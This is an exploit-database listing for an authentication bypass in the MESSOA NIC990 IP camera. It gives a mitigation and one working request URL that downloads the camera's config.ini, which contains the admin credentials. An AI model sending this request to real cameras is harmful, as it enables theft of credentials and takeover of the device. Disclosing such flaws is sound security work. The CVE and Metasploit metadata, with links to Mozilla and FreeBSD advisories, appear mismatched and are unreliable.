header-logo
Suggest Exploit
vendor:
NIC990 IP-Camera
by:
Todor Donev
7,5
CVSS
HIGH
Authentication Bypass
287
CWE
Product Name: NIC990 IP-Camera
Affected Version From: 1.0.0.0
Affected Version To: 1.0.0.3
Patch Exists: YES
Related CWE: CVE-2016-9072
CPE: h:messoa:nic990_ip_camera
Metasploit: https://www.rapid7.com/db/vulnerabilities/mfsa2016-89-cve-2016-9072/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2016-9072/https://www.rapid7.com/db/vulnerabilities/suse-cve-2016-9072/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2016

MESSOA NIC990 IP-Camera auth bypass configuration download

This vulnerability allows an attacker to download the configuration file of the MESSOA NIC990 IP-Camera without authentication. The configuration file contains the administrator's username and password, which can be used to gain access to the camera's web interface.

Mitigation:

Upgrade to the latest version of the MESSOA NIC990 IP-Camera firmware.
Source

Exploit-DB raw data:

# 
#
#  MESSOA NIC990 IP-Camera auth bypass configuration download
#
#  Copyright 2016 (c) Todor Donev <todor.donev at gmail.com>
#  http://www.ethical-hacker.org/
#  https://www.facebook.com/ethicalhackerorg
#  
#  Disclaimer:
#  This or previous programs is for Educational
#  purpose ONLY. Do not use it without permission.
#  The usual disclaimer applies, especially the
#  fact that Todor Donev is not liable for any
#  damages caused by direct or indirect use of the
#  information or functionality provided by these
#  programs. The author or any Internet provider
#  bears NO responsibility for content or misuse
#  of these programs or any derivatives thereof.
#  By using these programs you accept the fact
#  that any damage (dataloss, system crash,
#  system compromise, etc.) caused by the use
#  of these programs is not Todor Donev's
#  responsibility.
#  
#  Use them at your own risk!
#
#  
 
http://TARGET/cgi-bin/chklogin.cgi?file=config.ini

Navigation

Suggest Exploit

Services By CQR